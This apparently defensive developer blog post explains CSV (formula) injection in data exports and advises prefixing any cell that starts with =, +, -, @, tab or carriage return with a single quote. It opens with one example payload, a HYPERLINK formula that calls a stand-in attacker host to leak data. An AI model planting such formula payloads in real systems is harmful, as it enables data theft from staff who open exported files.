CSV Injection: The Export Button That Runs Code

A customer enters their name. They type =HYPERLINK("http://evil.example/leak", "click"). Your system accepts it. It looks like plain text.

Weeks later, your finance team exports a customer list to CSV. They open the file in Excel. That cell is no longer text. It is a formula.

This is CSV injection. People also call it formula injection. It is a common bug in e-commerce panels. Most teams do not test for it.

Spreadsheet apps do not treat every cell as text. If a cell starts with =, +, -, or @, Excel or Google Sheets reads it as a formula.

A formula can do more than math. It can build a URL. It can reach out to a network. In some cases, it can launch commands on a computer.

The data stays text in your database. It becomes executable the moment a human opens the file. Usually, the victim is a staff member with high access levels.

You are at risk anywhere you export user data:

  • Customer name and address exports
  • Order grids exported to CSV
  • Product feeds from vendors
  • Contact form dumps

An attacker does not need admin access. They set their own name as a formula and wait.

Do not try to fix this during input validation. The value is legitimate text until a spreadsheet reads it. Instead, sanitize the data when you write the CSV file.

If a cell starts with =, +, -, @, a tab, or a carriage return, add a single quote to the front.

Example logic: If the value starts with a trigger character, return "'" + value.

The single quote tells the spreadsheet to treat the cell as text. The spreadsheet hides the quote from the user. Run every field through this check before it enters the file.

Do not escape data in your database. The value is fine in your database and fine in your HTML. It is only dangerous in a CSV. Guard the CSV boundary to keep your data clean elsewhere.

Stop trusting your internal exports. Attackers target your staff through these files.

CSV injection does not trigger scary scanner alerts. It hides in the export button you built years ago. Check your CSV export code now. If you do not guard the first character of every cell, you are at risk.

Source: https://dev.to/iamrobindhiman/csv-injection-the-export-button-that-runs-code-on-someone-elses-machine-3ki6